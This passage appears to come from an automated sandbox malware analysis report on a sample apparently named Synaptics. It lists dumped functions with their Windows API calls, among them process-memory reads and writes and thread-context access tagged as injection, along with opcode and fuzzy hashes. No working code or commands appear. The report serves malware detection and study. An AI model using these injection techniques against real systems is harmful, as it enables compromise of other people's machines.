                                                    • Instruction ID: 8d469eef09ea989d3fa855d4cc37c4e782d9f66ed4e1643f377403a62116490d
                                                    • Opcode Fuzzy Hash: ef9214397b1977bd42ffd8de38bcf544da605e5464a93e9704cbda2e99a7472a
                                                    • Instruction Fuzzy Hash: 452103B69002089FDB24CF9AC584ADEFBF5BB48324F14852AD519AB200C375A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06051028 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06051099
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: ac98568da178961ed69d68d2e5aa7545167385e620bb4599b7ab668dd35e0b9c
                                                    • Instruction ID: 9ef302e0ea77fd4dfacbee62798222a21251ea19ddb07c99575ea30a1fd100ce
                                                    • Opcode Fuzzy Hash: ac98568da178961ed69d68d2e5aa7545167385e620bb4599b7ab668dd35e0b9c
                                                    • Instruction Fuzzy Hash: 0A21C3B58012599FDB10CF9AD984BDEFBF8FB48320F10842AE959A3251C378A544CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06050F70 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetThreadContext.KERNELBASE(?,00000000), ref: 06050FDB
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: ContextThread
                                                    • String ID:
                                                    • API String ID: 1591575202-0
                                                    • Opcode ID: fc520a818fc39ec95ea006e125a649642a2790aeb75374296ea24ddb6fe91903
                                                    • Instruction ID: 93188d510a04e264784fe4e8820171f6c78cd02f92d1aba8ba8d4851c86f82c3
                                                    • Opcode Fuzzy Hash: fc520a818fc39ec95ea006e125a649642a2790aeb75374296ea24ddb6fe91903
                                                    • Instruction Fuzzy Hash: C41134B2D006098FDB10CF9AC984BDFFBF4EB88320F158029E859A3600D778A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015D9840 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 015D98AE
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 7f7c9a47c3103438224242bc690e0f498b92695919058bb97031b3f06effc33d
                                                    • Instruction ID: e025ba84eaf88017063c6ed38a652b38159d00bb4576b005e02b9a311bab4d45
                                                    • Opcode Fuzzy Hash: 7f7c9a47c3103438224242bc690e0f498b92695919058bb97031b3f06effc33d
                                                    • Instruction Fuzzy Hash: 60111FB5C00649DFDB20CF9AD484BDEFBF5AF88314F14852AC829AB600C375A546CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06052128 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 06052188
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: c2cbb68904d37c3be8913fc865f613d8cbaa2e775c40bcbdd14ada5552555d1c
                                                    • Instruction ID: 12b504af8677343b5ae309853b10694818bac621a8c9e95b3ceeb01ff4715334
                                                    • Opcode Fuzzy Hash: c2cbb68904d37c3be8913fc865f613d8cbaa2e775c40bcbdd14ada5552555d1c
                                                    • Instruction Fuzzy Hash: 2F1155B28006099FCB10CF99C584BDEBBF4EF58320F14842AD959A7240C338A645CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015D9848 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 015D98AE
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: bd31f3dfd914fca0bf2b9bf93d0fb04e3a27529f34c99458bfd91caa0edee1e7
                                                    • Instruction ID: fbe4d28fe228178a3378a16160e089a6b7b4b500fe43cb81e8b4fee6442bda96
                                                    • Opcode Fuzzy Hash: bd31f3dfd914fca0bf2b9bf93d0fb04e3a27529f34c99458bfd91caa0edee1e7
                                                    • Instruction Fuzzy Hash: C51110B6C00649DFDB20CF9AC544BDEFBF4AF88628F14842AD519A7200C374A546CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06051429 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 0605148D
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 1f44837116a293b7cafcf8218ba8bb33cb08e96791207c7666fb3ef1d094dd58
                                                    • Instruction ID: f739b78a2a7f8ad46faadd8a37411abe8a490457d475d07eed3096e3a5766048
                                                    • Opcode Fuzzy Hash: 1f44837116a293b7cafcf8218ba8bb33cb08e96791207c7666fb3ef1d094dd58
                                                    • Instruction Fuzzy Hash: 261103B58002099FDB50CF9AD985BDEFFF8EB48324F148419E955A3600C375A584CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06052130 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 06052188
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: ff8bc8dd2209920a22d40dc7eb5b91aa26f58e65bbb6d6d8880d23cfa0b40caf
                                                    • Instruction ID: f3fbe4bcab4416ba03424a67119b9268b7025e0d60e40fb6bc48ca191cadcbe9
                                                    • Opcode Fuzzy Hash: ff8bc8dd2209920a22d40dc7eb5b91aa26f58e65bbb6d6d8880d23cfa0b40caf
                                                    • Instruction Fuzzy Hash: E61133B28006099FCB10CF99C588BDFBBF4EF58320F14842AD959A7240C738A685CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015DFEF8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 015DFF5D
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: d75d503cb883b15c0d093152edf8f2f402fbdca2a7cd64ea5b07366a6ab130af
                                                    • Instruction ID: ed822d5cc54e62731722a6add3a971afb3d2a416061cda368e1cb4915298aea0
                                                    • Opcode Fuzzy Hash: d75d503cb883b15c0d093152edf8f2f402fbdca2a7cd64ea5b07366a6ab130af
                                                    • Instruction Fuzzy Hash: FE1133B58002099FDB20CF99D585BDEFBF8FB48320F14885AD969A7340C374AA45CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015DFF00 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 015DFF5D
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: 6cbea0b1e0f2f10fc9ba72c3d8cc88fdb20249cef688f56a106558b241e81712
                                                    • Instruction ID: 3127e0370fc7a1e69f714fd4560f89305bd2716de2bf2a8f14a93931526c26ff
                                                    • Opcode Fuzzy Hash: 6cbea0b1e0f2f10fc9ba72c3d8cc88fdb20249cef688f56a106558b241e81712
                                                    • Instruction Fuzzy Hash: 811127B58002099FDB20CF99D584BDEFBF8FB49324F10845AD959A7340C374A945CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06051430 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 0605148D
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 9b709b7cd2d166d06a4aed58fc169151b35032704a511dd2507811a9e2aa8383
                                                    • Instruction ID: 59621225ebaac0fa12d5aa209d32e5c44a4b76a4694b9633ce651d91b2360666
                                                    • Opcode Fuzzy Hash: 9b709b7cd2d166d06a4aed58fc169151b35032704a511dd2507811a9e2aa8383
                                                    • Instruction Fuzzy Hash: 9D11D3B58002499FDB50CF99D984BDEBBF8EB48324F148459D955A7600C375A544CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0605119F Relevance: 1.5, APIs: 1, Instructions: 27injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06051164
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: ec2bd21bdc12609b79c08d7dbae52a6431e0f9bcd984036be4e5084cc723ef2d
                                                    • Instruction ID: df842c959593e22bed0817f57499c9a0478901148e9748cf1fe843150c0aea11
                                                    • Opcode Fuzzy Hash: ec2bd21bdc12609b79c08d7dbae52a6431e0f9bcd984036be4e5084cc723ef2d
                                                    • Instruction Fuzzy Hash: 18F0A0B2804354CEEB10CFA9D8083DEFBE4EB68325F1684ABC455A2692D3389149CB25
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 060639A8 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: db577eba591d5987bc0bd29e95aed059046ee94e798a429a88886626e7930494
                                                    • Instruction ID: 2bbdfca03c141a268e423e64ca2758d5f8ce241338a3119b6f676bf3cf720eb4
                                                    • Opcode Fuzzy Hash: db577eba591d5987bc0bd29e95aed059046ee94e798a429a88886626e7930494
                                                    • Instruction Fuzzy Hash: D2517C75A002199FDB99CFA9C885AAEBFF5FF48310B049069F905AB251D730DD44DF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06063999 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: a6136f39b3400fbb7c5bb69cc008c7dcdb6f07e615ab95d428c4e308b070917b
                                                    • Instruction ID: 4ec96f22611398ece0b2e7e68aee6fb63688dbdd123d31bd30c572fde643ce37
                                                    • Opcode Fuzzy Hash: a6136f39b3400fbb7c5bb69cc008c7dcdb6f07e615ab95d428c4e308b070917b
                                                    • Instruction Fuzzy Hash: 63216B76A002199FCB54CFA9C885AAFBBF9EF88314F04802AF914D7215D7309A45DF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06065210 Relevance: .3, Instructions: 332COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b3b9820a4ea2eb2464c6d894c385b3244dc224d9cebf5ec1d8ffa3d0e6302bdc
                                                    • Instruction ID: f9e14728e167cc582c22a803616a5a62f944ce484ea36beb66f3db77a657919d
                                                    • Opcode Fuzzy Hash: b3b9820a4ea2eb2464c6d894c385b3244dc224d9cebf5ec1d8ffa3d0e6302bdc
                                                    • Instruction Fuzzy Hash: 48D16D75A00209DFCB55DFA9C49499EBBF2FF88310B1585A9E8099B361DB30ED41CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05B0F804 Relevance: .3, Instructions: 289COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a35b9235b0af0a9c7190cdc3c453b74c992277ea8a6db99ad391e4d244a25709
                                                    • Instruction ID: 9a297a19e2028bb81c3a314cd6de29710d21939d0ed2e151c615aff34d6ea057
                                                    • Opcode Fuzzy Hash: a35b9235b0af0a9c7190cdc3c453b74c992277ea8a6db99ad391e4d244a25709
                                                    • Instruction Fuzzy Hash: 66C14B34B002049FDB24DFA4D498AADBBB2FF88314F5494A9E9069B3A5DB31EC45CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06061DF8 Relevance: .3, Instructions: 272COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25585d76a577088fc0ce98eb3b9ca23fa5b769d7e620286f87f483d1450f39d2
                                                    • Instruction ID: ec7062cb6399aa5f784e4e18dd048704d621c993cbfc9337a97169c93a81243a
                                                    • Opcode Fuzzy Hash: 25585d76a577088fc0ce98eb3b9ca23fa5b769d7e620286f87f483d1450f39d2
                                                    • Instruction Fuzzy Hash: 02B17330644340DFE7B0CF6AD588B55BBE2AF40354F4888A9E4458FAA2D775F9C9CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06069112 Relevance: .3, Instructions: 251COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac9e23d79ae8aca3292e2bb281beb8549d69a833967c0b65335d4827918929d7
                                                    • Instruction ID: 9e774b97978b82f21365ed7ebc1d6f60811207590814da57070593e04436cd74
                                                    • Opcode Fuzzy Hash: ac9e23d79ae8aca3292e2bb281beb8549d69a833967c0b65335d4827918929d7
                                                    • Instruction Fuzzy Hash: 9C919178A02205AFCB25CF64D845EDBBFFAEF89310B24855DF49697251DB309881CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06060618 Relevance: .2, Instructions: 206COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 31a15e4671a69cd6cb18dbc27634735e6b9b625b5acca4ac74ba3db6adebae8b
                                                    • Instruction ID: bcaa2e2532f5778af63c5fa7ca9b18737fb63d215f97ed42f2d00458971a3c7d
                                                    • Opcode Fuzzy Hash: 31a15e4671a69cd6cb18dbc27634735e6b9b625b5acca4ac74ba3db6adebae8b
                                                    • Instruction Fuzzy Hash: 45717E75A40209AFCB45DFA9C844AEEFBF5FF88310F148166E905D7211D730A955CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05B0E398 Relevance: .2, Instructions: 201COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cac95430fce68d37e0f4230b82ecf6cf85f6f3b917759bec53ddc760b6fa74ed
                                                    • Instruction ID: f6fd79a789218cec8b848a56195e7aadfcb4579bda9e828b4c3f63a8d68c7551
                                                    • Opcode Fuzzy Hash: cac95430fce68d37e0f4230b82ecf6cf85f6f3b917759bec53ddc760b6fa74ed
                                                    • Instruction Fuzzy Hash: 8881603460030ACFCB64DF68C5489AEBBFAFF84204B149D69D816C72A4EB70F945CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606D770 Relevance: .2, Instructions: 182COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c67ac0db8561687084efc8ca23c9603b7a69eb1c40bee8d8207f31519da17b2
                                                    • Instruction ID: 284c6e954e76f9ee08b6d799de92d467423c43f89a7f89af2d2c902e2cabf604
                                                    • Opcode Fuzzy Hash: 9c67ac0db8561687084efc8ca23c9603b7a69eb1c40bee8d8207f31519da17b2
                                                    • Instruction Fuzzy Hash: 5E615E30B402058FCB54DF69D598AADBBF6EF88314F1584A9E406EB3A0DB35EC45CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 060691E8 Relevance: .2, Instructions: 170COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d920b4088c8167041a4064d5cafad75f4334fa069939e8a65a3528a79c31cc97
                                                    • Instruction ID: b273932b3d349c1ad85e7a9c09b6033cf6a800db5659755182b286c2ad024559
                                                    • Opcode Fuzzy Hash: d920b4088c8167041a4064d5cafad75f4334fa069939e8a65a3528a79c31cc97
                                                    • Instruction Fuzzy Hash: E8615C74E012099FDB54DFA5D984AAEBBF6FF89310F14842AE506A73A4DB30AC41CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05B0E1A8 Relevance: .2, Instructions: 169COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 767bbf98c7853b40ed6bd5e01ac31663105ab050bf8824609157f6175cd123f2
                                                    • Instruction ID: a49532b96a56555b7ec41a63390993315d17a1a81a199ff16f36958414364c8c
                                                    • Opcode Fuzzy Hash: 767bbf98c7853b40ed6bd5e01ac31663105ab050bf8824609157f6175cd123f2
                                                    • Instruction Fuzzy Hash: 2861BFB5A002198FDB54CFA9C484A9EBBF6BF88310F14846AE919EB354E730EC41CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606CDD8 Relevance: .2, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3b40f88cbd2c071f6d6622c13da0e544a285ec79649a5ed7bcc79eda83c6381
                                                    • Instruction ID: 7defc377f86906b7ffbee32bf27131e21b747dde73dc012b8224dbf753b819f4
                                                    • Opcode Fuzzy Hash: e3b40f88cbd2c071f6d6622c13da0e544a285ec79649a5ed7bcc79eda83c6381
                                                    • Instruction Fuzzy Hash: EA51B376B042099FCB41CFA5D8448AFBFFAEF88210B14846AF955D3212DB31D855CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05B0E388 Relevance: .2, Instructions: 164COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e9afd16ce40649a5c933b76e7ac7061a77239b770de96dff5b138a3cbe5ba5c
                                                    • Instruction ID: bc7b5ffc9053f3dede07558c70815b3a47d2aef6e621e04700e215639204095d
                                                    • Opcode Fuzzy Hash: 6e9afd16ce40649a5c933b76e7ac7061a77239b770de96dff5b138a3cbe5ba5c
                                                    • Instruction Fuzzy Hash: E551737160030ACFCB64DF68C548AAABBFAFF44214F148D69D856C72A1D770F945CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05B0E199 Relevance: .2, Instructions: 151COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c663f0b9c9fe6552663c477961c27b97580a7a68a91dc93d5afe6800c69e0bec
                                                    • Instruction ID: cffeaa9aac42fa6aeefe9a0a68bbd577c748dc2ba9279965d8a0e143e581cc6c
                                                    • Opcode Fuzzy Hash: c663f0b9c9fe6552663c477961c27b97580a7a68a91dc93d5afe6800c69e0bec
                                                    • Instruction Fuzzy Hash: C551C2B5A002598FDB54CFA9C894A9EBBF6FF48210F14446AE819EB354E730ED41CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606D5C0 Relevance: .1, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d0927978854e264ae62a82f610832378c43a47da865958a117844f7cb04e815
                                                    • Instruction ID: 7b6b8c37d273b52cdced6ced8c87dac8e9a7d4ca500710794532339f3c3259b8
                                                    • Opcode Fuzzy Hash: 8d0927978854e264ae62a82f610832378c43a47da865958a117844f7cb04e815
                                                    • Instruction Fuzzy Hash: 5F518C35B042459FCBA1CF69C884AAABFF2FF45320F558595F455DB2A1D730E940CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06061259 Relevance: .1, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3c5fd306b9e671bb7994f610d02af5537540237deecc57d4ccdbc1552307dcd0
                                                    • Instruction ID: 11021525028d631bbd9eee982c4857af472dadba8bbbff59b34bd08dd1ecfae3
                                                    • Opcode Fuzzy Hash: 3c5fd306b9e671bb7994f610d02af5537540237deecc57d4ccdbc1552307dcd0
                                                    • Instruction Fuzzy Hash: D0510674E006199FDB65CF9AC884A9DFBF2BF48300F1485A9E54AAB761D770E981CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06065EE2 Relevance: .1, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d053eede3bc5e55c548776564248b53c067b326fc0d68b19146bcdcd318a7421
                                                    • Instruction ID: 72121e18bb88b2e990588ee91be5196588b90b6ceeb81186a3ff9e385f9f7d6a
                                                    • Opcode Fuzzy Hash: d053eede3bc5e55c548776564248b53c067b326fc0d68b19146bcdcd318a7421
                                                    • Instruction Fuzzy Hash: FA519D75A003069FCB54DF68C58899ABBF2FF89318B1489A9D4499B336DB30FD45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06065EF0 Relevance: .1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
